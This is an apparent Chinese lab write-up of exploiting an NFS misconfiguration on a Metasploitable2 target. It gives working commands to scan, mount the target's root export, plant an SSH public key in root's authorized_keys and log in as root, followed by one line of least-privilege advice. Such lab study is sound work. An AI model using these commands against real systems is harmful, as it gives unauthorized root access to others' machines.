NFS服务漏洞复现

  • 2019 年 10 月 7 日
  • 笔记

刚交了一份作业,关于NFS服务利用的,这里简单介绍一下。

NFS全称Network File System,即网络文件系统,属于网络层,主要用于网络间文件的共享,最早由sun公司开发。

复现环境:Kali2017、Metasploit2 复现思路:利用NFS服务将本地主机的ssh公钥传输到目标主机上,再利用ssh连接到目标主机

1、首先利用nmap扫描一下目标主机,查看是否存在ssh、nfs服务

~# nmap 172.16.1.130 -p 22,2049

2、在kali下连接靶机的NFS服务

~# apt-get install nfs-comm  ~# showmount -e 172.16.1.130  ~# mkdir /tmp/172.16.1.130  ~# mount -t nfs 172.16.1.130:/ /tmp/172.16.1.130/  ~# cd /tmp/172.16.1.130/  ~# ls -la

3、将本地主机的ssh公钥发送到目标主机并通过ssh连接靶机

~# ssh-keygen  ~# cat .ssh/id_rsa.pub >> /tmp/172.16.1.130/root/.ssh/authorized_keys  ~# ssh [email protected]

4、这个漏洞防御也主要在于权限的问题,本着最小权限的思想,对于一些普通文件所属用户普通用户即可,对于敏感的目录要限制普通用户访问。

VirMach 便宜 VPS

QNews

QNews